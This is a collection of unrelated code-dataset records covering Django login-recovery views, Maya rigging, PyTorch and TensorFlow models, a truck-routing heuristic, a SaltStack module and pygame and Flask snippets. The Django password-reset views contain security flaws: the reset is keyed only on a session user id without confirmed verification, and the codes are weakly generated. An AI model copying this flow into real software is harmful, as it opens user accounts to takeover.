request.user.user_type==0:\n return Teacher.objects.get(pk=request.user.pk)\n else :\n return Company.objects.get(pk=request.user.pk)\n\n\nfrom django.core.mail import EmailMessage\nimport random\nimport base64\n\ndef code_send(request,user):\n random_num = random.randrange(100000, 999999)\n auth_num = base64.b64encode(str(random_num).encode('ascii'))\n auth_num = auth_num.decode(\"utf-8\")\n\n request.session['tmp_auth_num'] = auth_num\n\n content = \"The verification code is \\'\" + auth_num + \"\\'.\"\n email_instance = EmailMessage('Eduboby verification code', content, to=[user.email])\n email_instance.send()\n\ndef email_resend(request):\n user=BaseUser.objects.get(pk=request.session['tmp_user'])\n code_send(request,user)\n return render(request, \"code_input.html\", {'is_resend':True})\n\ndef find_pwd_by_email(request):\n if request.method=='POST':\n email=request.POST['email']\n user=BaseUser.objects.filter(email=email)\n if user.count()==0:\n return render(request, \"find_pwd.html\", {'error2': True})\n\n user=user.first()\n\n if user.username != request.POST['username']:\n return render(request, \"find_pwd.html\", {'error':True})\n request.session['tmp_user'] = user.pk\n\n code_send(request,user)\n return redirect('input_code')\n\n return render(request, \"find_pwd.html\")\n\ndef input_code(request):\n if request.session.get('tmp_auth_num') is None:\n return redirect('find_pwd_by_email')\n\n if request.method==\"POST\":\n auth_num = request.POST['auth_num']\n if auth_num == request.session['tmp_auth_num']:\n request.session.pop('tmp_auth_num')\n request.session.pop('tmp_user')\n return redirect('password_reset')\n else:\n return render(request, \"code_input.html\", {'error':True})\n\n return render(request, \"code_input.html\")\n\ndef find_id_by_email(request):\n if request.method==\"POST\":\n email=request.POST['email']\n user=BaseUser.objects.filter(email=email)\n if user.count()==0 :\n return render(request, \"find_id.html\", {'error': True})\n\n\n user=user.first()\n\n content=\"Your username is \\'\"+user.username +\"\\'.\"\n email_instance = EmailMessage('Eduboby username lookup', content, to=[email])\n email_instance.send()\n return render(request, \"find_id.html\", {'sended':True})\n\n return render(request, \"find_id.html\")\n
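# Annotator note on code_send() above (not in the original file): base64 only
# obfuscates the 6-digit code, it does not protect it. A worked round trip:
#
#     >>> import base64
#     >>> base64.b64encode(b"123456").decode("utf-8")
#     'MTIzNDU2'
#     >>> base64.b64decode("MTIzNDU2")
#     b'123456'
#
# A production flow would store a salted hash of the code in the session instead.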
\ndef password_reset(request):\n if request.method==\"POST\":\n if request.POST['password'] != request.POST['password_re']:\n return render(request, \"password_reset.html\", {'error':True})\n\n\n user=BaseUser.objects.get(pk=request.session['tmp_user'])\n\n user.set_password(request.POST['password'])\n user.save()\n return redirect('login')\n\n return render(request,\"password_reset.html\")\n","sub_path":"eduboby/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61821531","text":"'''\nmain base class and module class construction for rig\n'''\n\nimport maya.cmds as mc\nfrom . import controls\n\n\nclass RigModule():\n\n '''\n class for creating rig modules\n '''\n\n def __init__(\n self,\n name='new',\n baseRig=None,\n ):\n '''\n @param name: str, name for module\n @param baseRig: instance of baseRig class module\n '''\n\n # check if any current modules in scene\n if mc.objExists('{0}*_module'.format(name)):\n amount = len(mc.ls('{0}*_module'.format(name))) + 1\n else:\n amount = 1\n\n self.moduleName = '{0}{1:02d}'.format(name, amount)\n\n # create module group structure\n self.topGrp = mc.group(n='{0}_module'.format(self.moduleName), em=1)\n\n self.jointsGrp = mc.group(n='{0}_joints'.format(self.moduleName), em=1, p=self.topGrp)\n self.mechGrp = mc.group(n='{0}_mech'.format(self.moduleName), em=1, p=self.topGrp)\n self.noTransGrp = mc.group(n='{0}_noTrans'.format(self.moduleName), em=1, p=self.topGrp)\n\n mc.hide(self.mechGrp, self.noTransGrp)\n mc.setAttr('{0}.it'.format(self.noTransGrp), 0, l=1)\n\n # add attributes\n mc.addAttr(self.topGrp, ln='rigModule', dt='string')\n mc.setAttr('{0}.{1}'.format(self.topGrp, 'rigModule'),\n self.moduleName, type='string', l=1)\n\n # parent module to base class\n if baseRig:\n mc.parent(self.topGrp, baseRig.modulesGrp)\n if not baseRig:\n if mc.objExists('modules_grp'):\n mc.parent(self.topGrp, 'modules_grp')\n","sub_path":"autoRig/Base/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
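# Annotator note (not part of autoRig/Base/module.py): a hedged usage sketch for
# RigModule above. It only runs inside Maya (maya.cmds), and 'spine' is an
# illustrative module name, not from the original file:
#
#     mod = RigModule(name='spine')    # creates spine01_module plus joints/mech/noTrans groups
#     mod2 = RigModule(name='spine')   # name clash detected, auto-increments to spine02_module
#     # given a base rig instance, the module parents itself under baseRig.modulesGrp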
 +{"seq_id":"168898100","text":"import threading\ndef contar(numero):\n contador = 0\n while 1:\n contador+=1\n print(numero, threading.get_ident(), contador)\n\nfor numero in range(1, 11):\n hilo = threading.Thread(target=contar,\n args=(numero,),\n daemon=True)\n hilo.start()\n\n\n# Get the main thread\nhilo_ppal = threading.main_thread()\n# Iterate over the active threads to monitor their execution state\nfor hilo in threading.enumerate():\n # If the thread is the main thread, continue to the next active thread\n if hilo is hilo_ppal:\n continue\n # Get info on the current thread and the number of active threads\n print(hilo.getName(),\n hilo.ident,\n hilo.isDaemon(),\n threading.active_count())\n # The program will wait for this thread to finish:\n hilo.join()","sub_path":"rddtool/hiloEX.py","file_name":"hiloEX.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"589991407","text":"\n\n# class header\nclass _ASSAULT():\n\tdef __init__(self,): \n\t\tself.name = \"ASSAULT\"\n\t\tself.definitions = [u'a violent attack: ', u'a determined or serious attempt to do something difficult: ', u'a threat to injure someone followed by a violent attack on them ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_assault.py","file_name":"_assault.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557426010","text":"import torch\nimport torch.nn as nn\nimport math\nfrom torch.nn import functional as F\nfrom torch.distributions import constraints\nfrom torchvision.datasets import MNIST\nfrom torchvision import transforms as tvt\nfrom neural_networks.layers import ConvBlock, UpResBloc, Reshape\nimport pyro\nfrom pyro import infer, optim, poutine\nfrom pyro import distributions as D\nfrom galaxy_gen.forward_models import random_pose_transform\nfrom galaxy_gen.backward_models import delta_sample_transformer_params\nfrom galaxy_gen.etn import transformers, networks\nfrom galaxy_gen.etn import transforms as T\nfrom galaxy_gen.etn import coordinates\n\nfrom kornia import augmentation\nfrom torch.utils.tensorboard import SummaryWriter\nimport torchvision\nimport os\nimport glob\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Will take any insize as long as it is divisible by 16\n output is a dictionary with four variables\n dictionary[\"transform\"] is a transformation\n dictionary[\"transform_params\"] are parameters that parameterise that \n transformation\n dictionary[\"z_mu\"] is the mean of the latent variable\n dictionary[\"z_std\"] is the standard dev of that latent variable\n so the latent space is the z and std in this transformed coordinate frame\n We output the theta that parameterises this coordinate frame\n and the z in this transformed coordinate frame\n\n \"\"\"\n def __init__(self,\n transformer: transformers.Transformer,\n insize=56, z_dim=10):\n super().__init__()\n self.transformer = transformer\n self.insize = insize\n self.linear_size = int(((insize/16)**2)*16)\n self.net = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # second conv pair\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # third conv\n nn.Conv2d(32, 16, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # fourth conv\n nn.Conv2d(16, 16, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # linear\n\n # linear\n\n )\n\n self.loc = nn.Linear(int(self.linear_size), z_dim)\n self.scale = nn.Linear(int(self.linear_size), z_dim)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n output = {}\n transform_output = self.transformer(x)\n output[\"transform\"] = transform_output[\"transform\"]\n 
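# NOTE (annotator comment, not in the original file): \"transform\" here is a list of composable pose transforms predicted from x; the last entry is applied to an identity grid below to resample x into a pose-normalized frame.\n 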
output[\"transform_params\"] = transform_output[\"params\"]\n \n grid = coordinates.identity_grid(\n [self.insize, self.insize], device=x.device\n )\n grid = grid.expand(x.shape[0], *grid.shape)\n\n transformed_grid = output[\"transform\"][-1](grid)\n \n x = x - 0.222 # lol this complicates switching datasets severely\n x = x / 0.156\n\n view = T.broadcasting_grid_sample(x, transformed_grid)\n\n output[\"view\"] = view # might want this later as well\n\n split = self.net(view)\n split = self.relu(split)\n reshape = split.view(-1, self.linear_size)\n z_loc = self.loc(reshape)\n z_scale = torch.exp(self.scale(reshape))\n\n output[\"z_mu\"] = z_loc\n output[\"z_std\"] = z_scale\n\n return output, split\n\nclass Decoder(nn.Module):\n def __init__(self, z_dim=10, outsize=56):\n super().__init__()\n self.z_dim = z_dim\n self.outsize = outsize\n self.linear_size = int((outsize/8)**2)\n self.linear = nn.Linear(z_dim, self.linear_size)\n self.net = nn.Sequential(\n nn.ELU(),\n UpResBloc(1, 32),\n nn.ELU(),\n nn.BatchNorm2d(32),\n ConvBlock(32, bias=False),\n UpResBloc(32, 32),\n nn.ELU(),\n ConvBlock(32, bias=False),\n ConvBlock(32, bias=False),\n UpResBloc(32, 1),\n nn.Sigmoid()\n )\n \n def forward(self, z):\n z = self.linear(z)\n z = torch.reshape(z, (-1, 1, int(self.outsize/8), int(self.outsize/8)))\n loc_img = self.net(z)\n return loc_img\n\n\n\nif __name__ == \"__main__\":\n x = torch.zeros([10, 1, 80, 80])\n transformers = transformers.TransformerSequence(\n transformers.Translation(networks.EquivariantPosePredictor, 1, 32),\n transformers.Rotation(networks.EquivariantPosePredictor, 1, 32))\n\n encoder = Encoder(transformers, insize=80, z_dim=10)\n decoder = Decoder(z_dim=10, outsize=80)\n x = encoder(x)\n x = x[\"z_mu\"]\n x = decoder(x)\n\n \n","sub_path":"neural_networks/encoder_decoder.py","file_name":"encoder_decoder.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"544020571","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\n\nfilename1 = \"data/train_x.csv\"\nfilename2 = \"data/train_y.csv\"\nfilename3 = \"data/test_x.csv\"\n\ndf1 = pd.read_csv(filename1)\ndf2 = pd.read_csv(filename2)\ndf3 = pd.read_csv(filename3)\n\nx_train = df1.values\ny_train = df2.values\nx_test = df3.values\n\n\nn_dims = len(x_train[0])\nn_samples = len(x_train)\nn_test = len(x_test)\n\nprint(np.shape(x_train[0]))\n\n\nX = tf.placeholder('float',[n_dims,1])\nY = tf.placeholder('float',[1])\nw = tf.Variable(tf.zeros([1,n_dims]))\nb = tf.Variable(tf.zeros([1]))\n\nY_predict = tf.matmul(w, X) + b\n\nloss = tf.square(Y-Y_predict,name=\"loss\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./graphs/linear_model', sess.graph)\n for i in range(1000):\n total_loss = 0\n for j in range(n_samples):\n x = x_train[j].reshape(n_dims,1)\n y = y_train[j].reshape(1)\n _, l = sess.run([optimizer,loss],feed_dict={X: x, Y: y})\n total_loss += l\n print('Epoch {0}: {1}'.format(i, total_loss / n_samples))\n\n w_out, b_out = sess.run([w, b])\n print(w_out, b_out)\n\nresult = []\nfor i in range(n_test):\n x = x_test[i].reshape(n_dims,1)\n y_predict = int(np.matmul(w_out,x)+ b_out)\n print(y_predict)\n result.append([y_predict])\n\ndf4 = 
pd.DataFrame(result)\ndf4.to_csv(\"data/test_y.csv\", index=False)","sub_path":"bicycle_rent_linear_reg/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26228986","text":"\r\n# Brian Parsons\r\n# Student ID - 001008912\r\n# C950 - Data Structures & Algorithms II\r\n# Performance Assessment\r\n\r\nimport distances\r\nimport copy\r\nfrom hashTable import hashtable\r\n\r\n# reads csv and populates a graph with addresses and weights\r\ndistance_graph = distances.get_graph('WGUPS Distances.csv')\r\ndistance_graph.populate_address(hashtable)\r\n\r\n# B1 - Pseudocode to show algorithm's process\r\n# While packages remain in the list\r\n# for each package\r\n# if at start, go forward\r\n# find the next package with the shortest shipping address distance\r\n# remove the used package from the list\r\n\r\n# B3 - Big O Notation = O(n^2)\r\n\r\n# Greedy algorithm. Chooses smallest length first out of given list\r\n\r\n\r\n# O(n^2) - each pass of the while loop scans the remaining addresses for the nearest one\r\ndef greedy_path(path, start='4001 South 700 East'):\r\n\r\n # gets the list of distances from the graph made by the graph file\r\n weight_list = distance_graph.edge_weights\r\n address_list = copy.copy(path)\r\n\r\n # takes a starting point as input\r\n # note: starting point should not already be part of path\r\n greed_path = [start]\r\n\r\n while len(address_list) != 0:\r\n\r\n minimum = [0, start]\r\n for address in address_list:\r\n\r\n # skips address if the start address and end address are the same\r\n if address == start:\r\n continue\r\n\r\n # compares distances for each address from the last entry in greed_path\r\n # minimum distance is stored with its address\r\n distance = weight_list[greed_path[-1], address]\r\n if minimum[0] == 0:\r\n minimum = [distance, address]\r\n if distance < minimum[0] and distance != 0:\r\n minimum = [distance, address]\r\n\r\n # appends the new minimum distance address to greed_path and removes from remaining list\r\n if minimum[1] not in greed_path:\r\n greed_path.append(minimum[1])\r\n address_list.remove(minimum[1])\r\n\r\n # removes the hub from the new path\r\n # makes future comparisons much easier\r\n if '4001 South 700 East' in greed_path:\r\n greed_path.remove('4001 South 700 East')\r\n return greed_path\r\n
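# Annotator note: a tiny worked example of the nearest-neighbor selection that
# greedy_path() performs (my illustration; it uses a plain dict instead of the
# distance_graph.edge_weights lookup, so the names here are hypothetical):
#
#     weights = {('hub', 'a'): 5, ('hub', 'b'): 2, ('b', 'a'): 1}
#     # from 'hub', the closer stop 'b' (2 mi) is chosen before 'a' (5 mi),
#     # giving hub -> b -> a (3 mi) rather than hub -> a -> b (6 mi).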
\r\n\r\n# O(n)\r\ndef total_distance(path):\r\n\r\n # gives a cumulative total distance of a path based on distance_graph weights\r\n weight_list = distance_graph.edge_weights\r\n total = 0\r\n for i in range(0, len(path) - 1):\r\n total += weight_list[path[i], path[i+1]]\r\n\r\n # adds the distance from last index in path to hub since all trucks return to hub\r\n total += weight_list[path[-1], '4001 South 700 East']\r\n return total\r\n\r\n\r\n# O(n)\r\ndef current_distance(path, address):\r\n\r\n # same as total_distance, but only calculates until a given address\r\n # will use this to see if a truck has gone far enough to have 'visited' address\r\n weight_list = distance_graph.edge_weights\r\n total = 0\r\n for i in range(0, path.index(address)):\r\n total += weight_list[path[i], path[i+1]]\r\n return total\r\n\r\n\r\n# making trucks into a class will make keeping up with packages, addresses, and time much easier\r\nclass Truck:\r\n def __init__(self):\r\n\r\n self.packages = []\r\n self.route = []\r\n self.start_time = 'None'\r\n\r\n # total distance of truck route\r\n self.length = 0\r\n\r\n # O(n)\r\n def insert(self, address):\r\n\r\n # inserting addresses instead of just packages so that packages going to same address are loaded together\r\n # this makes the sorting algorithm more efficient as # addresses will always be <= # packages\r\n self.route.append(address)\r\n for package in distance_graph.address_list[address]:\r\n self.packages.append(package)\r\n\r\n # O(n)\r\n def remove(self, address):\r\n\r\n # removes address from truck route\r\n self.route.remove(address)\r\n\r\n # removes all packages associated with removed address\r\n for item in distance_graph.address_list[address]:\r\n self.packages.remove(item)\r\n\r\n # recalculates route distance\r\n self.length = total_distance(self.route)\r\n\r\n # O(n^2) - re-sorts the route via greedy_path\r\n def individual_insert(self, package):\r\n\r\n if package[1] != '':\r\n\r\n # if the package has an address, this will insert the address and package individually\r\n self.route.append(package[1])\r\n self.packages.append(package)\r\n\r\n # removes hub address to make greed algorithm work\r\n self.route.remove('4001 South 700 East')\r\n self.route = greedy_path(self.route)\r\n\r\n # inserts hub address at the beginning for accurate total_distance calculation\r\n self.route.insert(0, '4001 South 700 East')\r\n self.length = total_distance(self.route)\r\n\r\n # O(n) - touches every loaded package\r\n def leave_hub(self, time):\r\n\r\n # sets a start time to be compared to for distance calculations\r\n self.start_time = time\r\n\r\n # edits status of package\r\n for package in self.packages:\r\n package[8] = 'En Route'\r\n\r\n # O(n^2)\r\n def passed_time(self, time):\r\n\r\n if self.start_time != 'None':\r\n\r\n # sees how much time has passed since truck left hub (in minutes)\r\n delta_time = time - self.start_time\r\n\r\n # trucks go 18 mi/hr == 0.3 mi/min\r\n distance_traveled = delta_time * 0.3\r\n for location in self.route:\r\n\r\n # check each location on the route to see if it has been reached\r\n if distance_traveled > current_distance(self.route, location):\r\n for item in distance_graph.address_list[location]:\r\n\r\n # if location has been reached, goes through all of the items in the truck associated\r\n # with that location and 'delivers'\r\n if item in self.packages:\r\n item[8] = 'Delivered'\r\n self.packages.remove(item)\r\n print('Package %d Delivered' % item[0])\r\n\r\n\r\n# initializes the 3 trucks as well as an address list to load packages from\r\nt1 = Truck()\r\nt2 = Truck()\r\nt3 = Truck()\r\naddresses = []\r\n\r\n\r\n# O(n^2) - five sequential passes over the address list\r\ndef load_trucks():\r\n\r\n for address in distance_graph.address_list:\r\n\r\n # doesn't check hub address as no packages will go here\r\n # makes a list of addresses to check for packages with set criteria\r\n if address != '4001 South 700 East':\r\n addresses.append(address)\r\n\r\n # puts all packages with the earliest due time into truck1 as it will leave first\r\n for item in distance_graph.address_list[address]:\r\n if item[5] == '9:00':\r\n t1.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n # this will be used as an index so the high priority packages aren't moved from their point in queue\r\n checker1 = t1.route.index(t1.route[-1])\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # loads items with time constraints and special notes second since they have both priority\r\n # and special parameters\r\n if item[5] == '10:30' and item[7] != '':\r\n\r\n # since it would be impossible to code for all possible special notes, user is prompted to load\r\n # these manually based on the special 
notes\r\n print(\"Package %d has special note: %s\\nLoad into which truck?\\n(1, 2, 3)\" % (item[0], item[7]))\r\n truck = input()\r\n if truck == '1':\r\n t1.insert(address)\r\n elif truck == '2':\r\n t2.insert(address)\r\n elif truck == '3':\r\n t3.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # next the packages with time constraints but no special notes are loaded\r\n if item[5] == '10:30':\r\n\r\n # the total distance change is compared between truck 1 and 2 using a greedy algorithm\r\n # the algorithm will run multiple times, making this not exactly efficient\r\n # however, it gives better results than just adding an item to the end of the list\r\n delta1 = total_distance(greedy_path(t1.route + [address], t1.route[checker1])) - \\\r\n total_distance(greedy_path(t1.route, t1.route[checker1]))\r\n delta2 = total_distance(greedy_path(t2.route + [address])) \\\r\n - total_distance(greedy_path(t2.route))\r\n\r\n # truck 1 will leave before truck 2, so I gave time restricted packages a slight bias for truck 1\r\n if delta1 < delta2 + 1:\r\n t1.insert(address)\r\n else:\r\n t2.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n # sorts addresses, leaving the higher time priority packages in place in queue\r\n # checker indexes will secure the place in queue for the time priority packages\r\n t1.route = greedy_path(t1.route, t1.route[checker1])\r\n checker1 = t1.route.index(t1.route[-1])\r\n t2.route = greedy_path(t2.route)\r\n checker2 = t2.route.index(t2.route[-1])\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # next are the packages with special notes but no time constraints\r\n # these are also loaded manually\r\n if item[7] != '':\r\n print(\"Package %d has special note: %s\\nLoad into which truck?\\n(1, 2, 3)\" % (item[0], item[7]))\r\n truck = input()\r\n if truck == '1':\r\n t1.insert(address)\r\n elif truck == '2':\r\n t2.insert(address)\r\n elif truck == '3':\r\n t3.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n for address in addresses:\r\n\r\n # at this point, the 16 package limit becomes a concern, so we need to start tracking that\r\n # counts the number of packages associated with an address\r\n packages = 0\r\n for item in distance_graph.address_list[address]:\r\n packages += 1\r\n\r\n # just like before, compares the total distances after greed sort starting at the checker indexes\r\n delta1 = total_distance(greedy_path(t1.route + [address], t1.route[checker1])) - total_distance(\r\n greedy_path(t1.route, t1.route[checker1]))\r\n delta2 = total_distance(greedy_path(t2.route + [address], t2.route[checker2])) - total_distance(\r\n greedy_path(t2.route, t2.route[checker2]))\r\n\r\n # looks at truck 3 as well\r\n # if truck 3 has no packages, compares instead to the distance from the hub to the address\r\n if len(t3.route) > 0:\r\n delta3 = total_distance(greedy_path(t3.route + [address])) - total_distance(greedy_path(t3.route))\r\n else:\r\n delta3 = distance_graph.edge_weights[address, '4001 South 700 East']\r\n\r\n # inserts into the truck with the smallest delta AND won't be overfilled\r\n if delta1 < delta2 and delta1 < delta3 and len(t1.packages) + packages <= 16:\r\n t1.insert(address)\r\n elif delta2 < delta3 and 
len(t2.packages) + packages <= 16:\r\n t2.insert(address)\r\n else:\r\n t3.insert(address)\r\n\r\n # sorts the new addresses into new list without interfering with the old queue\r\n append1 = greedy_path(t1.route[checker1:], t1.route[checker1])\r\n append2 = greedy_path(t2.route[checker2:], t2.route[checker2])\r\n\r\n # adds the new lists to the end of the old without interrupting the time-priority queue\r\n t1.route = t1.route[:checker1] + append1\r\n t2.route = t2.route[:checker2] + append2\r\n t3.route = greedy_path(t3.route)\r\n\r\n # adds the hub as the first index in each route in order to calculate total distance\r\n t1.route.insert(0, '4001 South 700 East')\r\n t2.route.insert(0, '4001 South 700 East')\r\n t3.route.insert(0, '4001 South 700 East')\r\n\r\n # calculates the total distance of each route\r\n t1.length = total_distance(t1.route)\r\n t2.length = total_distance(t2.route)\r\n t3.length = total_distance(t3.route)\r\n","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":12595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270769938","text":"def solution():\n inputString = input()\n inputString = inputString.split(' ')\n timeNeed = int(inputString[0])\n d = float(float(inputString[1])/100)\n k = float(float(inputString[2])/100)\n probs = [d]\n temp = d\n max_hundred = 1\n while temp < 1:\n temp += (temp*k)\n probs.append(temp)\n max_hundred += 1\n answer = 0.0\n i = 1\n probs[-1] = 1.0\n while i <= max_hundred:\n temp = timeNeed * i\n for j in range(i):\n if j == i-1:\n temp *= probs[j]\n else:\n temp *= (1-probs[j])\n answer += temp\n i += 1\n print(answer)\n\n\nsolution()\n","sub_path":"BOJ/UCPC/heykakao.py","file_name":"heykakao.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"81498393","text":"from __future__ import absolute_import\n\nimport logging\nfrom pathlib import Path\n\nimport salt.utils\nimport salt.ext.six as six\n\n__virtualname__ = 'niteststand_remote_executor'\n\nlog = logging.getLogger(__name__)\n\nexecutor_path = \"C:\\\\Program Files\\\\\" \\\n \"National Instruments\\\\TestStand Executor\\\\\" \\\n \"NationalInstruments.TestStandExecutor.exe\"\n\n\ndef __virtual__():\n return __virtualname__\n\n\ndef _executor_installed():\n path = Path(executor_path)\n return path.exists()\n\n\ndef _get_webservice_user(**kwargs):\n webservice_user = None\n for key, value in kwargs.items():\n if key == '__pub_metadata':\n webservice_user = value['ws_user']\n return webservice_user\n\n\ndef execute(sequence_file, local_properties, **kwargs):\n webservice_user = _get_webservice_user(**kwargs)\n arg = '{0} execute \"{1}\" -v'.format(executor_path, sequence_file)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n for prop in local_properties:\n arg = '{0} {1}'.format(arg, prop)\n return __salt__['cmd.run_all'](arg, python_shell=False)\n\n\ndef can_execute(sequence_file, **kwargs):\n ret = {\n 'can_execute': True\n }\n if not _executor_installed():\n ret['can_execute'] = False\n arg = '{0} find \"{1}\" -v'.format(executor_path, sequence_file)\n webservice_user = _get_webservice_user(**kwargs)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n find_cmd_ret = __salt__['cmd.run_all'](arg, python_shell=False)\n if find_cmd_ret['retcode'] != 0:\n ret['can_execute'] = False\n return ret\n
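# Annotator note (not part of niteststand_remote_executor.py): as a Salt
# execution module, the functions above would typically be invoked from the
# master CLI; 'test-minion' and the sequence path are illustrative only:
#
#     salt 'test-minion' niteststand_remote_executor.list_sequences
#     salt 'test-minion' niteststand_remote_executor.can_execute 'C:\tests\smoke.seq'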
\n\ndef list_sequences(pattern=None, **kwargs):\n arg = '{0} list'.format(executor_path)\n if pattern:\n arg = '{0} {1}'.format(arg, pattern)\n webservice_user = _get_webservice_user(**kwargs)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n list_cmd_ret = __salt__['cmd.run_all'](arg, python_shell=False)\n return list_cmd_ret['stdout'].replace('\\r', '').split('\\n')\n","sub_path":"Packages/NiPackages/TestStand Executor/data/ProgramData/National Instruments/salt/var/cache/salt/minion/extmods/modules/niteststand_remote_executor.py","file_name":"niteststand_remote_executor.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"65164028","text":"from flask_wtf import Form\nfrom wtforms import StringField, FloatField, DateField\nfrom wtforms.validators import DataRequired\n\n\nclass NewDepositForm(Form):\n bank = StringField('bank', validators=[DataRequired()])\n account_no = StringField('account_no')\n account_type = StringField('account_type')\n rate_of_interest = FloatField(\"rate_of_interest\")\n date_of_investment = DateField(\"date_of_investment\", format='%d/%m/%Y', render_kw={\"data-format\": \"d/m/Y\"})\n due_date = DateField(\"due_date\", format='%d/%m/%Y', render_kw={\"data-format\": \"d/m/Y\"})\n invested_value = FloatField('invested_value')\n investor = StringField('investor')\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568300456","text":"# highScores\nimport os, pygame, configure, pickle,copy\n\n\nclass OneScore(object):\n \"\"\"A single (name, score) high-score entry\"\"\"\n def __init__(self, name, score):\n self.name = name\n self.score = score\n\n def __repr__(self):\n return self.name + \"\\t\" + str(self.score)\n\n def __gt__(self, other):\n return (isinstance(other, OneScore) and (self.score > other.score))\n\nclass HighScores(object):\n \"\"\"Loads, saves and displays the persisted high-score list\"\"\"\n def __init__(self):\n self.c = configure.Configure()\n self.allScore = []\n # testCode \n # self.testSave()\n # testCode ends\n self.loadScores()\n\n def loadScores(self):\n # the first time the player plays, the file does not exist yet\n try:\n with open(\"highscroes.pickle\",\"rb\") as f:\n self.allScore = pickle.load(f)\n print(\"loaded\")\n except (OSError, pickle.PickleError):\n pass\n \n def addScores(self, newScore):\n self.allScore.append(newScore)\n self.allScore.sort(key = lambda x: x.score)\n self.allScore.reverse()\n self.allScore = self.allScore[:6]\n\n with open(\"highscroes.pickle\",\"wb\") as f:\n pickle.dump(self.allScore, f)\n print(\"saved \") # testCode\n \n # the main function in the highScores\n def displayScores(self):\n \"\"\" the following template cited from \n http://programarcadegames.com/python_examples/\n f.php?file=pygame_base_template.py\n \"\"\"\n # Define some colors\n BLACK = (0, 0, 0) \n pygame.init()\n \n # Set the width and height of the screen [width, height]\n size = (self.c.WIDTH, self.c.HEIGHT)\n self.screen = pygame.display.set_mode(size)\n \n pygame.display.set_caption(\"HighScores\")\n \n self.drawBackground()\n # Loop until the user clicks the close button.\n self.done = False\n \n # Used to manage how fast the screen updates\n clock = pygame.time.Clock()\n \n # -------- Main Program Loop -----------\n while not self.done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n\n if event.type == 
pygame.MOUSEBUTTONDOWN:\n self.done = True\n print(\"MOUSEBUTTONDOWN\")\n\n # --- Game logic should go here\n \n # --- Drawing code should go here\n self.redrawAll()\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 60 frames per second\n clock.tick(self.c.FPS)\n \n # Close the window and quit.\n\n def drawBackground(self):\n self.bgPath = self.c.IMAGE_PATH + \"highScores.png\"\n self.bgImage = pygame.image.load(self.bgPath).convert()\n self.screen.blit(self.bgImage,(0,0))\n\n def redrawAll(self):\n self.drawScore()\n\n def drawScore(self):\n # 170 + 39 \n # the bottom of the size \n frLeft = 327\n frRight = 581\n frBot = 170\n dHeight = 39\n frTop = frBot - dHeight\n font = pygame.font.Font(None, 35)\n index = 1\n for obj in self.allScore:\n name = obj.name\n score = obj.score\n formatStr = \" #%d %11s %9d\" % (index, name, score)\n index += 1\n # this will get a new surface \n line = font.render(formatStr, True, (0, 0, 0))\n # the following three lines are modified but cited from \n# http://nullege.com/codes/show/\n# src%40w%40r%40writing_games_tutorial-HEAD%40examples%40example4%40example1.py/\n# 221/pygame.font.Font.render/python\n lineRect = line.get_rect()\n lineRect.x = frLeft\n # index - 2 because index ++ \n lineRect.y = (frTop + frBot)/2 + (index - 2) * dHeight\n 